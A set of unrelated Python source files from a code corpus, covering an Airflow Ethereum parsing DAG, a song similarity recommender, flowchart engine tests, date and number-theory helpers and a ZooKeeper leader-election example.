        """Write *content* to *name*, register the replica location with
        the lead node and report success.

        Bug fix: the original had an unreachable ``return False`` after
        ``return True``.
        """
        with open(name, "wb") as file:
            file.write(content)
        self.register_location(name)
        return True

    def pick_and_repeat(self, name, content, ttl):
        """Forward the write to a single neighbour (naive placement).

        Bug fix: iterating a dict yields keys only, so the original
        ``for mac, node in self.neighbours`` raised ValueError; iterate
        ``items()`` instead.
        """
        for mac, node in self.neighbours.items():
            # TODO: Criteria
            node.write_repeat(name, content, ttl)
            break  # Escape for loop

    def make_payload(self, method, params):
        """Build a JSON-RPC 2.0 request payload."""
        return {
            "method": method,
            "params": params,
            "jsonrpc": "2.0",
            "id": 0,
        }

    def get_ip(self):
        """Return this node's address ('localhost' in debug mode)."""
        if self.debug:
            return "localhost"
        else:
            return ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']

    def register(self):
        """Announce this node to the lead, retrying every 20 s until the
        call succeeds.

        Rewritten as a loop with a narrowed handler: the original retried
        via bare ``except:`` recursion, which hid real errors and grew the
        call stack without bound while the lead was unreachable.
        """
        payload = self.make_payload(
            "register_node",
            {
                "ip": self.get_ip(),
                "mac": hex(get_mac()),
                "version": self._version,
                "port": self.port,
                "units": self.storage_units
            }
        )
        while True:
            try:
                self.leadNode.call(payload)
                return
            except Exception:
                time.sleep(20)

    def register_location(self, file_name):
        """Tell the lead node that *file_name* is stored on this node."""
        self.leadNode.call(
            self.make_payload(
                "register_location",
                {
                    "file_name": file_name,
                    "location": hex(get_mac()),
                }
            )
        )
if __name__ == "__main__":
    # `--debug` points the node at a lead node running on localhost.
    debug = (len(sys.argv) > 1 and sys.argv[1] == '--debug')
    with open('config.json') as config_file:
        client = ClientNode(json.load(config_file), debug)
        client.start()
| StarcoderdataPython |
144566 | <gh_stars>1-10
from datetime import datetime, timedelta
def get_next_monday(now=None):
    """Return the date of the next Monday on or after *now*.

    If *now* falls on a Monday, its own date is returned.

    Bug fix: the original default ``now=datetime.now()`` was evaluated once
    at import time, so in a long-running process the function returned
    results relative to the import moment, not the call moment.  The default
    is now resolved per call.
    """
    if now is None:
        now = datetime.now()
    # Monday is weekday 0; step forward by the remaining days of the week.
    return (now + timedelta(days=(7 - now.weekday()) % 7)).date()
def get_actual_monday(now=None):
    """Return the date of the Monday of *now*'s week (today if Monday).

    Bug fix: the original default ``now=datetime.now()`` was evaluated once
    at import time; it is now resolved per call.
    """
    if now is None:
        now = datetime.now()
    # Monday is weekday 0; step back by the number of days already elapsed.
    return (now - timedelta(days=now.weekday())).date()
1766518 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class KoubeiMerchantKbcloudSubuserloginstatusQueryModel(object):
    """Request model for koubei.merchant.kbcloud.subuserloginstatus.query.

    Carries a session id and a sub-user id, and converts to/from the plain
    dict shape used by the Alipay gateway.
    """

    # Wire field names handled by the dict conversions below.
    _FIELDS = ('session_id', 'sub_user_id')

    def __init__(self):
        self._session_id = None
        self._sub_user_id = None

    @property
    def session_id(self):
        return self._session_id

    @session_id.setter
    def session_id(self, value):
        self._session_id = value

    @property
    def sub_user_id(self):
        return self._sub_user_id

    @sub_user_id.setter
    def sub_user_id(self, value):
        self._sub_user_id = value

    def to_alipay_dict(self):
        """Serialize the set (truthy) fields to a plain dict."""
        params = dict()
        for name in self._FIELDS:
            value = getattr(self, name)
            if value:
                if hasattr(value, 'to_alipay_dict'):
                    value = value.to_alipay_dict()
                params[name] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build a model from a gateway dict; returns None for empty input."""
        if not d:
            return None
        model = KoubeiMerchantKbcloudSubuserloginstatusQueryModel()
        for name in KoubeiMerchantKbcloudSubuserloginstatusQueryModel._FIELDS:
            if name in d:
                setattr(model, name, d[name])
        return model
| StarcoderdataPython |
3262393 | <filename>output/models/nist_data/list_pkg/decimal/schema_instance/nistschema_sv_iv_list_decimal_min_length_1_xsd/__init__.py<gh_stars>1-10
from output.models.nist_data.list_pkg.decimal.schema_instance.nistschema_sv_iv_list_decimal_min_length_1_xsd.nistschema_sv_iv_list_decimal_min_length_1 import NistschemaSvIvListDecimalMinLength1
__all__ = [
"NistschemaSvIvListDecimalMinLength1",
]
| StarcoderdataPython |
3221614 | <gh_stars>1-10
from __future__ import print_function
import collections
import logging
import os
from datetime import datetime, timedelta
from glob import glob
from airflow import models
from airflow.operators.bash_operator import BashOperator
from airflow.operators.email_operator import EmailOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.sensors import ExternalTaskSensor
from google.cloud import bigquery
from ethereumetl_airflow.bigquery_utils import create_view, share_dataset_all_users_read
from ethereumetl_airflow.common import read_json_file, read_file
from ethereumetl_airflow.parse.parse_logic import ref_regex, parse, create_dataset
# Configure root logging at import time so parse progress shows up in logs.
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
# DAG resources live under the Airflow DAGs folder (GCS-mounted in Composer).
dags_folder = os.environ.get('DAGS_FOLDER', '/home/airflow/gcs/dags')
def build_parse_dag(
        dag_id,
        dataset_folder,
        parse_destination_dataset_project_id,
        notification_emails=None,
        parse_start_date=datetime(2018, 7, 1),
        schedule_interval='0 0 * * *',
        parse_all_partitions=None,
        send_success_email=False
):
    """Build an Airflow DAG that parses Ethereum logs/traces into the tables
    described by the JSON table definitions in *dataset_folder*.

    One parse task is created per ``*.json`` definition file; ``*.sql`` files
    become BigQuery views on top of the parsed dataset.  ``ref()`` markers in
    a definition's ``contract_address`` create inter-table dependencies.
    When *parse_all_partitions* is truthy, all partitions are reprocessed and
    the DAG id gets a ``_FULL`` suffix.
    """
    logging.info('parse_all_partitions is {}'.format(parse_all_partitions))
    if parse_all_partitions:
        dag_id = dag_id + '_FULL'
    # Kovan testnet data lives in a different public project/dataset.
    if 'ethereum_kovan_parse' in dag_id:
        SOURCE_PROJECT_ID = 'public-data-finance'
        SOURCE_DATASET_NAME = 'crypto_ethereum_kovan'
        PARTITION_DAG_ID = 'ethereum_kovan_partition_dag'
    else:
        SOURCE_PROJECT_ID = 'bigquery-public-data'
        SOURCE_DATASET_NAME = 'crypto_ethereum'
        PARTITION_DAG_ID = 'ethereum_partition_dag'
    default_dag_args = {
        'depends_on_past': True,
        'start_date': parse_start_date,
        'email_on_failure': True,
        'email_on_retry': False,
        'retries': 5,
        'retry_delay': timedelta(minutes=5)
    }
    if notification_emails and len(notification_emails) > 0:
        default_dag_args['email'] = [email.strip() for email in notification_emails.split(',')]
    dag = models.DAG(
        dag_id,
        catchup=False,
        schedule_interval=schedule_interval,
        default_args=default_dag_args)
    # Validate eagerly but surface failures through a task, so that one bad
    # dataset does not break construction of the other DAGs built in a loop.
    validation_error = None
    try:
        validate_definition_files(dataset_folder)
    except ValueError as e:
        validation_error = e
    # This prevents failing all dags as they are constructed in a loop in ethereum_parse_dag.py
    if validation_error is not None:
        def raise_validation_error(ds, **kwargs):
            raise validation_error
        validation_error_operator = PythonOperator(
            task_id='validation_error',
            python_callable=raise_validation_error,
            provide_context=True,
            execution_timeout=timedelta(minutes=10),
            dag=dag
        )
        return dag

    def create_parse_task(table_definition):
        """Return (operator, ref_dependencies) for one table definition."""
        def parse_task(ds, **kwargs):
            client = bigquery.Client()
            parse(
                bigquery_client=client,
                table_definition=table_definition,
                ds=ds,
                source_project_id=SOURCE_PROJECT_ID,
                source_dataset_name=SOURCE_DATASET_NAME,
                destination_project_id=parse_destination_dataset_project_id,
                sqls_folder=os.path.join(dags_folder, 'resources/stages/parse/sqls'),
                parse_all_partitions=parse_all_partitions
            )
        table_name = table_definition['table']['table_name']
        parsing_operator = PythonOperator(
            task_id=table_name,
            python_callable=parse_task,
            provide_context=True,
            execution_timeout=timedelta(minutes=60),
            dag=dag
        )
        # ref(...) markers in contract_address point at other parsed tables.
        contract_address = table_definition['parser']['contract_address']
        if contract_address is not None:
            ref_dependencies = ref_regex.findall(table_definition['parser']['contract_address'])
        else:
            ref_dependencies = []
        return parsing_operator, ref_dependencies

    def create_add_view_task(dataset_name, view_name, sql):
        """Return an operator that (re)creates one BigQuery view."""
        def create_view_task(ds, **kwargs):
            client = bigquery.Client()
            dest_table_name = view_name
            dest_table_ref = create_dataset(client, dataset_name, parse_destination_dataset_project_id).table(dest_table_name)
            print('View sql: \n' + sql)
            create_view(client, sql, dest_table_ref)
        create_view_operator = PythonOperator(
            task_id=f'create_view_{view_name}',
            python_callable=create_view_task,
            provide_context=True,
            execution_timeout=timedelta(minutes=10),
            dag=dag
        )
        return create_view_operator

    def create_share_dataset_task(dataset_name):
        """Return an operator that makes the dataset world-readable
        (only when publishing from the blockchain-etl project)."""
        def share_dataset_task(**kwargs):
            if parse_destination_dataset_project_id != 'blockchain-etl':
                logging.info('Skipping sharing dataset.')
            else:
                client = bigquery.Client()
                share_dataset_all_users_read(client, f'{parse_destination_dataset_project_id}.{dataset_name}')
                share_dataset_all_users_read(client, f'{parse_destination_dataset_project_id}-internal.{dataset_name}')
        share_dataset_operator = PythonOperator(
            task_id='share_dataset',
            python_callable=share_dataset_task,
            provide_context=True,
            execution_timeout=timedelta(minutes=10),
            dag=dag
        )
        return share_dataset_operator

    # Parsing must wait until the upstream partition DAG has finished.
    wait_for_ethereum_load_dag_task = ExternalTaskSensor(
        task_id='wait_for_ethereum_partition_dag',
        external_dag_id=PARTITION_DAG_ID,
        external_task_id='done',
        execution_delta=timedelta(minutes=30),
        priority_weight=0,
        mode='reschedule',
        poke_interval=5 * 60,
        timeout=60 * 60 * 12,
        dag=dag)
    json_files = get_list_of_files(dataset_folder, '*.json')
    logging.info(json_files)
    all_parse_tasks = {}
    task_dependencies = {}
    for json_file in json_files:
        table_definition = read_json_file(json_file)
        task, dependencies = create_parse_task(table_definition)
        wait_for_ethereum_load_dag_task >> task
        all_parse_tasks[task.task_id] = task
        task_dependencies[task.task_id] = dependencies
    # Fan-in checkpoint: downstream work runs only after every parse task.
    checkpoint_task = BashOperator(
        task_id='parse_all_checkpoint',
        bash_command='echo parse_all_checkpoint',
        priority_weight=1000,
        dag=dag
    )
    # Wire ref() dependencies between parse tasks; fail fast on dangling refs.
    for task, dependencies in task_dependencies.items():
        for dependency in dependencies:
            if dependency not in all_parse_tasks:
                raise ValueError(
                    'Table {} is not found in the the dataset. Check your ref() in contract_address field.'.format(
                        dependency))
            all_parse_tasks[dependency] >> all_parse_tasks[task]
        all_parse_tasks[task] >> checkpoint_task
    final_tasks = [checkpoint_task]
    dataset_name = os.path.basename(dataset_folder)
    full_dataset_name = 'ethereum_' + dataset_name
    share_dataset_task = create_share_dataset_task(full_dataset_name)
    checkpoint_task >> share_dataset_task
    final_tasks.append(share_dataset_task)
    # Create views
    sql_files = get_list_of_files(dataset_folder, '*.sql')
    logging.info(sql_files)
    for sql_file in sql_files:
        sql = read_file(sql_file)
        base_name = os.path.basename(sql_file)
        view_name = os.path.splitext(base_name)[0]
        create_view_task = create_add_view_task(full_dataset_name, view_name, sql)
        checkpoint_task >> create_view_task
        final_tasks.append(create_view_task)
    # Optional success notification after every terminal task has finished.
    if notification_emails and len(notification_emails) > 0 and send_success_email:
        send_email_task = EmailOperator(
            task_id='send_email',
            to=[email.strip() for email in notification_emails.split(',')],
            subject='Ethereum ETL Airflow Parse DAG Succeeded',
            html_content='Ethereum ETL Airflow Parse DAG Succeeded for {}'.format(dag_id),
            dag=dag
        )
        for final_task in final_tasks:
            final_task >> send_email_task
    return dag
def get_list_of_files(dataset_folder, filter='*.json'):
    """Return the paths in *dataset_folder* matching the glob pattern *filter*.

    (The parameter name ``filter`` shadows the builtin but is kept for
    backward compatibility with keyword callers.)
    """
    logging.info('get_list_of_files')
    logging.info(dataset_folder)
    logging.info(os.path.join(dataset_folder, filter))
    # glob() already returns a list; no need to copy it via a comprehension.
    return glob(os.path.join(dataset_folder, filter))
def validate_definition_files(dataset_folder):
    """Validate every ``*.json`` table definition in *dataset_folder*.

    Checks that each file has a ``table`` section whose ``dataset_name``
    matches the folder name and whose ``table_name`` matches the file name,
    and that table names are unique case-insensitively.

    Raises:
        ValueError: on the first violation found.
    """
    json_files = get_list_of_files(dataset_folder, '*.json')
    dataset_folder_name = dataset_folder.split('/')[-1]
    all_lowercase_table_names = []
    for json_file in json_files:
        file_name = json_file.split('/')[-1].replace('.json', '')
        table_definition = read_json_file(json_file)
        table = table_definition.get('table')
        if not table:
            raise ValueError(f'table is empty in file {json_file}')
        dataset_name = table.get('dataset_name')
        if not dataset_name:
            raise ValueError(f'dataset_name is empty in file {json_file}')
        if dataset_folder_name != dataset_name:
            raise ValueError(f'dataset_name {dataset_name} is not equal to dataset_folder_name {dataset_folder_name}')
        table_name = table.get('table_name')
        if not table_name:
            raise ValueError(f'table_name is empty in file {json_file}')
        if file_name != table_name:
            raise ValueError(f'file_name {file_name} doest match the table_name {table_name}')
        all_lowercase_table_names.append(table_name.lower())
    # collections.Counter replaces the manual defaultdict counting loop.
    table_name_counts = collections.Counter(all_lowercase_table_names)
    non_unique_table_names = [name for name, count in table_name_counts.items() if count > 1]
    if non_unique_table_names:
        raise ValueError(f'The following table names are not unique {",".join(non_unique_table_names)}')
1754074 |
import numpy as np
from pylbm.stencil import Velocity
import pytest
import random
def test_velocity_argument():
    """Constructing a Velocity with no arguments must raise."""
    with pytest.raises(Exception):
        Velocity()
@pytest.mark.parametrize('dim, axis',
                         [(1, [None, 0]),
                          (2, [None, 0, 1]),
                          (3, [None, 0, 1, 2])])
def test_symmetric(dim, axis):
    """Reflecting a velocity twice about the same axis is the identity."""
    for i in np.random.randint(1000, size=100):
        v = Velocity(dim=dim, num=i)
        for a in axis:
            vs = v.get_symmetric(axis=a).get_symmetric(axis=a)
            # Both the vector and its scheme number must round-trip.
            assert(vs.v == v.v and vs.num == v.num)
@pytest.mark.parametrize('dim', [1, 2, 3])
def test_symmetric_shuffle(dim):
    """Applying a random reflection sequence and then its reverse must
    restore the original velocity (reflections are involutive)."""
    for i in np.random.randint(1000, size=100):
        v = Velocity(dim=dim, num=i)
        axis = np.random.randint(dim, size=5)
        vs = v
        for a in axis:
            vs = vs.get_symmetric(axis=a)
        for a in axis[::-1]:
            vs = vs.get_symmetric(axis=a)
        assert(vs.v == v.v and vs.num == v.num)
| StarcoderdataPython |
3398993 | /usr/local/lib/python2.7/posixpath.py | StarcoderdataPython |
3219561 | <gh_stars>1-10
from __future__ import unicode_literals
import frappe
def get_context(context):
    """Populate the website page context for the Agent Application page."""
    context.title = "Agent Application"
| StarcoderdataPython |
3382313 | <reponame>rojinva/music-recommendations_Hybrid
from datetime import datetime
import pandas
from app.DataReader import DataReader, DataSource
class SongFeatureSimilarity:
    """Content-based song-to-song similarity computed from catalogue
    metadata (genres, artist, composer, lyricist, language)."""

    # NOTE(review): these are class attributes, so the catalogue index and
    # the similarity cache are shared by all instances — confirm intended.
    data_reader = DataReader()
    SONG_DATA = {}
    CACHED_SIMILARITIES = {}

    def __init__(self):
        # Index every catalogue row by song_id for O(1) lookup later.
        entries = self.data_reader.read_file(DataSource.SONGS)
        for index, row in entries.iterrows():
            self.SONG_DATA[row['song_id']] = row

    def compute_song_to_song_similarity(self, song_a_id, song_b_id):
        """Return the cached similarity for the pair, computing and caching
        it (symmetrically) on a miss."""
        if song_a_id in self.CACHED_SIMILARITIES.keys():
            if song_b_id in self.CACHED_SIMILARITIES[song_a_id].keys():
                return self.CACHED_SIMILARITIES[song_a_id][song_b_id]
        score = self.__calculate_similarity(song_a_id, song_b_id)
        self.__cache_similarity(song_a_id, song_b_id, score)
        return score

    def __cache_similarity(self, song_a_id, song_b_id, similarity):
        # Store the score in both directions since similarity is symmetric.
        if song_a_id not in self.CACHED_SIMILARITIES.keys():
            self.CACHED_SIMILARITIES[song_a_id] = {}
        self.CACHED_SIMILARITIES[song_a_id][song_b_id] = similarity
        if song_b_id not in self.CACHED_SIMILARITIES.keys():
            self.CACHED_SIMILARITIES[song_b_id] = {}
        self.CACHED_SIMILARITIES[song_b_id][song_a_id] = similarity

    def __calculate_similarity(self, song_a_id, song_b_id):
        # Resolve ids to catalogue rows and score their features.
        song_a = self.SONG_DATA[song_a_id]
        song_b = self.SONG_DATA[song_b_id]
        score = self._compute_song_to_song_similarity(song_a, song_b)
        return score

    def parse_list(self, entity):
        """Split a pipe-delimited feature value into trimmed items."""
        return list(map(lambda a: a.strip(), entity.split('|')))

    def get_similarity_for_feature(self, song_a, song_b, feature):
        """Score one feature: 0 if either value is missing; exact match for
        scalar (float) values; list overlap for pipe-delimited values.

        NOTE(review): the list score is |A ∩ B| / (|A| + |B|), not a Jaccard
        index — identical lists score 0.5, not 1.0; confirm intended.
        """
        if pandas.isnull(song_a[feature]) or pandas.isnull(song_b[feature]):
            return 0.0
        if type(song_a[feature]) is float:
            return 1.0 if song_a[feature] == song_b[feature] else 0.0
        song_a_list = self.parse_list(song_a[feature])
        song_b_list = self.parse_list(song_b[feature])
        intersection = list(set(song_a_list) & set(song_b_list))
        return float(len(intersection)) / (len(song_a_list) + len(song_b_list))

    def _compute_song_to_song_similarity(self, song_a, song_b):
        """Average the per-feature scores over the fixed feature set."""
        total_similarity = 0.0
        feature_names = ['genre_ids', 'artist_name', 'composer', 'lyricist',
                         'language']
        for feature in feature_names:
            feature_similarity = self.get_similarity_for_feature(song_a, song_b,
                                                                 feature)
            total_similarity += feature_similarity
        return total_similarity / len(feature_names)
class SongsFeatureSimilarityStats:
    """Precompute pairwise feature similarities between all songs, keeping
    only pairs that score above MIN_SIMILARITY."""

    MIN_SIMILARITY = 0.1
    SONG_TO_SONG_SIMILARITY = {}  # song_id -> {other_song_id: similarity}
    data_reader = DataReader()
    ifs = SongFeatureSimilarity()

    def compute_pairwise_similarities(self):
        """Fill SONG_TO_SONG_SIMILARITY for every song in the catalogue.

        Bug fixes versus the original: `entries` was referenced but never
        defined (NameError on first call) — it is now loaded from the song
        catalogue; whole rows were passed where
        compute_song_to_song_similarity expects song ids; and the pair
        check used identity (`is not`) instead of value inequality.
        """
        entries = self.data_reader.read_file(DataSource.SONGS)
        count = 0
        start_timer = datetime.now()
        for index, entry_a in entries.iterrows():
            count += 1
            if count % 1000 == 0:
                # Progress/timing trace for long runs.
                print("Features " + str(count))
                print(datetime.now() - start_timer)
                start_timer = datetime.now()
            to_others_similarity = {}
            for index, entry_b in entries.iterrows():
                if entry_a['song_id'] != entry_b['song_id']:
                    similarity = self.ifs.compute_song_to_song_similarity(
                        entry_a['song_id'], entry_b['song_id'])
                    if similarity > self.MIN_SIMILARITY:
                        to_others_similarity[entry_b['song_id']] = similarity
            self.SONG_TO_SONG_SIMILARITY[entry_a['song_id']] = to_others_similarity
3216055 | <reponame>powerboat9-school/UDT
import math

# Signal band limits (frequency units as used by the transmitter).
MIN_SIG = 17000
MAX_SIG = 19000
# Width of each of the 32 evenly spaced signal bins.
BIN_SIZE = math.floor((MAX_SIG - MIN_SIG) / 32)


def getSignal(num):
    """Map a 5-bit value (0-31) to the base frequency of its signal bin.

    Bug fixes: the original used C-style ``||``/``!`` operators (a syntax
    error in Python) and compared the builtin ``int`` instead of ``num``;
    ``math`` was also never imported.
    """
    if num is None or not isinstance(num, int) or num < 0 or num > 31:
        raise Exception("Invalid signal")
    return MIN_SIG + BIN_SIZE * num


def translate():
    def snd(msg):
        """Reject anything that is not a string before transmission."""
        if msg is None or not isinstance(msg, str):
            # str(type(msg)) — the original concatenated a type object to a
            # string, which itself raised TypeError instead of this message.
            raise Exception("Could not send type " + str(type(msg)))
1610569 | <reponame>nanofrog/asyncflow<gh_stars>10-100
import sys
sys.path.append("../flowchart/generate")
import asyncflow
import Flowchart_AI
import Flowchart_Subchart
import time
import asyncflow
from io import StringIO
import pytest
class EventId():
    """Event ids from event_info.json, named by their argument count."""
    Event0Arg = 3
    Event1Arg = 4
    Event2Arg = 5
class Character:
    """Test double driven by the flowcharts; collects Say() output so the
    tests can assert on it."""

    # Registry of every character spawned via CreateCharacter.
    allCharacter = []

    def __init__(self):
        self.output = []

    def Say(self, s):
        """Record *s* (stringified) in the output log."""
        #print(s)
        self.output.append(str(s))

    def CreateCharacter(self):
        """Spawn a child character that shares this character's output log
        and register/start it with asyncflow."""
        char = Character()
        Character.allCharacter.append(char)
        char.output = self.output
        asyncflow.register(char)
        asyncflow.start(char)
        return char
# Frame-relative event schedule: frame offset -> [event_id, *event_args].
eventlist = {
    1: [ 3 ],
    2: [ 4, " hello" ],
    3: [ 5, " first", " second" ]
}
# The output counts of SubchartTest_07/08/09 depend on whether subcharts
# execute immediately when started.  (translated from the original comment)
# Each row: (chart_name, run_time_seconds, event_schedule, expected_output).
testdata = [
    ("AI.test_01", 0, {}, ["hello"])
    , ("AI.test_02", 0, {}, ["0", "1000"])
    , ("AI.test_03", 0, {}, ["hello"])
    , ("AI.test_04", 2, {}, ["hello", "world", "0", "hello", "world", "1000", "hello", "world", "2000"])
    , ("AI.test_05", 0, eventlist, ["event 0 pass", "event 1 pass hello", "event 2 pass", "1st arg first", "2nd arg second"])
    , ("AI.test_06", 0, {}, ["subunit pass"])
    , ("AI.test_07", 0, {}, ["1", "2", "3", "3", "4", "7", "7"])
    , ("AI.test_09", 0, {}, ["node 1", "node 2", "node 3", "all node runned"])
    , ("AI.test_10", 0, eventlist, ["event 0 pass", "event 1 pass hello", "event 2 pass", "1st arg first", "2nd arg second"])
    , ("AI.test_11", 0, {}, ["hello sub", "subunit pass", "green"])
    , ("AI.test_12", 0, {}, ["1", "2"])
    , ("AI.test_13", 0, {}, ["hello"])
    , ("AI.test_14", 3, {}, ["1", "2", "3", "4", "1", "2", "3", "4","1", "2", "3", "4","1", "2", "3", "4"])
    , ("AI.test_15", 0, {}, ["1000", "2000", "6000"])
    , ("AI.test_16", 0, eventlist, ["1000", "2000", "2200"])
    , ("AI.test_17", 0, {}, ["1000", "1000", "2000", "4000"])
    ,("Subchart.SubchartTest_01", 5, {},
      ["hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub"])
    ,("Subchart.SubchartTest_02", 5, {},
      ["hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub"])
    , ("Subchart.SubchartTest_03", 5, {},
       ["hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub"])
    , ("Subchart.SubchartTest_04", 5, {},
       ["hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub"])
    , ("Subchart.SubchartTest_05", 5, {},
       ["hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub"])
    , ("Subchart.SubchartTest_06", 5, {},
       ["hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub"])
    , ("Subchart.SubchartTest_07", 0.5, {},
       ["hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub"])
    , ("Subchart.SubchartTest_08", 0.5, {},
       ["hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub"])
    , ("Subchart.SubchartTest_09", 0.5, {},
       ["hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub"])
    , ("Subchart.SubchartTest_10", 5, {}, ["joinsub", "end","joinsub", "end","joinsub", "end", "joinsub", "end", "joinsub"])
    , ("Subchart.SubchartTest_11", 0, {}, ["hellosub", "hellosub", "hellosub", "end"])
    , ("Subchart.SubchartTest_12", 0, {}, ["hellosub", "hellosub", "hellosub", "end"])
    , ("Subchart.SubchartTest_13", 0, {}, ["hellosub", "hellosub", "hellosub", "end"])
]
def RaiseEvent(obj, event_list, step):
    """Fire the event scheduled for this frame, if any, on *obj*."""
    # Events start firing from frame 21 (i.e. 2.1 s in); shift so the
    # schedule in event_list is relative to that point.
    # (translated from the original Chinese comment)
    step = step - 20
    if step in event_list:
        print("raise event ", step)
        event_id = event_list[step][0]
        asyncflow.event(obj, event_id, *event_list[step][1:])
@pytest.mark.parametrize("chart_name, run_time, event_list, result", testdata)
def test_RunCase(chart_name, run_time, event_list, result):
    """Drive one flowchart for *run_time* seconds of 100 ms frames, firing
    scheduled events, and compare the character's output to *result*."""
    frame = 0
    step_time = 100  # milliseconds per simulated frame
    run_time = run_time or 10  # 0 in testdata means "use the 10 s default"
    total_frames = int(run_time * 1000 // step_time)
    print('total_frames', total_frames)
    asyncflow.setup()
    asyncflow.import_charts("../flowchart/generate/Flowchart_AI.json")
    asyncflow.import_charts("../flowchart/generate/Flowchart_Subchart.json")
    asyncflow.import_event("../flowchart/generate/event_info.json")
    c = Character()
    asyncflow.register(c)
    asyncflow.attach(c, chart_name)
    asyncflow.start(c)
    asyncflow.step(0)
    for i in range(total_frames):
        # Deliver events to dynamically created characters as well.
        for item in Character.allCharacter:
            RaiseEvent(item, event_list, frame)
        RaiseEvent(c, event_list, frame)
        asyncflow.step(step_time)
        frame = frame + 1
    assert result == c.output
    print('output', c.output)
    asyncflow.deregister(c)
    asyncflow.step(10)
    asyncflow.exit()
def test_attach_chart_params():
    """Attach a subchart with initial parameters and a result callback, then
    restart it repeatedly and check the callback-collected output."""
    asyncflow.setup()
    asyncflow.import_charts("../flowchart/generate/Flowchart_AI.json")
    asyncflow.import_event("../flowchart/generate/event_info.json")
    c = Character()
    agent = asyncflow.register(c)
    tbl = dict()  # NOTE(review): unused — confirm it can be removed
    params_tbl = dict()
    params_tbl["x"] = 2
    params_tbl["y"] = 3
    params_tbl["ss"] = 4
    def callback(value):
        # Chart return value is routed into the character's output log.
        c.Say(value)
    chart = asyncflow.attach(c,"AI.test_07_sub",params_tbl)
    chart.set_callback(callback)
    del chart
    agent.start()
    for i in range(10):
        asyncflow.step(10)
    assert ["2","3","5","5"] == c.output
    # Restarting the chart must reproduce the same output every time.
    for i in range(10):
        c.output=[]
        print(i)
        asyncflow.start(c,["AI.test_07_sub"])
        for i in range(10):
            asyncflow.step(10)
        assert c.output == ["2","3","5"]
    asyncflow.remove(c,"AI.test_07_sub")
    asyncflow.deregister(c)
    asyncflow.step(10)
    asyncflow.exit()
if __name__ == "__main__":
    # Manual entry point: run all parametrised cases without pytest.
    test_attach_chart_params()
    for params in testdata:
        test_RunCase(*params)
154401 | <gh_stars>1-10
from typing import List
import numpy as np
from rdkit import Chem
from scoring.component_parameters import ComponentParameters
from scoring.score_components.base_score_component import BaseScoreComponent
from scoring.score_summary import ComponentSummary
class MatchingSubstructure(BaseScoreComponent):
    """Score component that rewards molecules matching any of the
    configured SMARTS substructure patterns."""

    def __init__(self, parameters: ComponentParameters):
        super().__init__(parameters)
        self.target_smarts = self.parameters.smiles  # these are actually smarts
        self._validate_inputs(self.parameters.smiles)

    def calculate_score(self, molecules: List) -> ComponentSummary:
        """Score each molecule: 1.0 on a substructure hit, 0.5 otherwise."""
        score = self._substructure_match(molecules, self.target_smarts)
        score_summary = ComponentSummary(total_score=score, parameters=self.parameters)
        return score_summary

    def _smiles_to_fingerprints(self, smiles: List[str], radius=3, useCounts=True, useFeatures=True) -> tuple:
        # This is intentionally doing nothing as the input is expected to be in smarts rather than in smiles
        idx = []
        fps = []
        return fps, idx

    def _substructure_match(self, query_mols, list_of_SMARTS):
        """Return 0.5 * (1 + match) per molecule; all ones when no patterns
        are configured (component becomes a no-op)."""
        if len(list_of_SMARTS) == 0:
            return np.ones(len(query_mols), dtype=np.float32)
        match = [any([mol.HasSubstructMatch(Chem.MolFromSmarts(subst)) for subst in list_of_SMARTS
                      if Chem.MolFromSmarts(subst)]) for mol in query_mols]
        return 0.5 * (1 + np.array(match))

    def _validate_inputs(self, smiles):
        """Raise IOError on any SMARTS pattern that RDKit cannot parse."""
        for smart in smiles:
            if Chem.MolFromSmarts(smart) is None:
                raise IOError(f"Invalid smarts pattern provided as a matching substructure: {smart}")
| StarcoderdataPython |
175466 | <filename>examples/election.py
import logging
import random
from tornado import gen
log = logging.getLogger()
def arguments(parser):
    """Register the election example's command-line options on *parser*."""
    for flags, opts in (
        (("--workers", "-w"),
         dict(type=int, default=5, help="Number of workers to launch.")),
        (("--znode-path", "-p"),
         dict(type=str, default="examplelock",
              help="ZNode path to use for the election.")),
    ):
        parser.add_argument(*flags, **opts)
)
@gen.coroutine
def run(client, args):
log.info("Launching %d workers.", args.workers)
yield client.start()
order = list(range(args.workers))
random.shuffle(order)
yield [worker(i, client, args) for i in order]
yield client.close()
@gen.coroutine
def worker(number, client, args):
    """Join the leader election once, log the outcome and resign."""
    election = client.recipes.LeaderElection(args.znode_path)
    yield election.join()
    if election.has_leadership:
        log.info("[WORKER #%d] I am the leader!", number)
    else:
        log.info("[WORKER #%d] not the leader.", number)
    yield election.resign()
| StarcoderdataPython |
3253071 | <reponame>sumit-158/fermulerpy<gh_stars>1-10
import math
import warnings
def get_divisors(n):
    """
    Finds all divisors of a number in ascending order

    Parameters
    ----------
    n : int
        denotes the natural number of which divisors needs to be calculated

    return : array
        returns a sorted array of the divisors of n

    Raises
    ------
    ValueError
        if n is not a positive integer

    Bug fix: for perfect squares the original appended the square root three
    times (twice to the small-divisors list and once to the large list), e.g.
    get_divisors(4) returned [1, 2, 2, 2, 4].
    """
    if(n<=0):
        raise ValueError(
            "n must be a positive integer"
        )
    small = []
    large = []
    for i in range(1, int(math.sqrt(n)) + 1):
        if n % i == 0:
            small.append(i)
            # When i * i == n, i equals n // i — record it only once.
            if i * i != n:
                large.append(n // i)
    return small + large[::-1]
def divisor_count(n):
    """
    Calculates d(n), the number of divisors of a natural number

    Parameters
    ----------
    n : int
        natural number whose divisors are counted

    return : int
        the number of divisors of n
    """
    if(n<=0):
        raise ValueError(
            "n must be a natural number"
        )
    total = 0
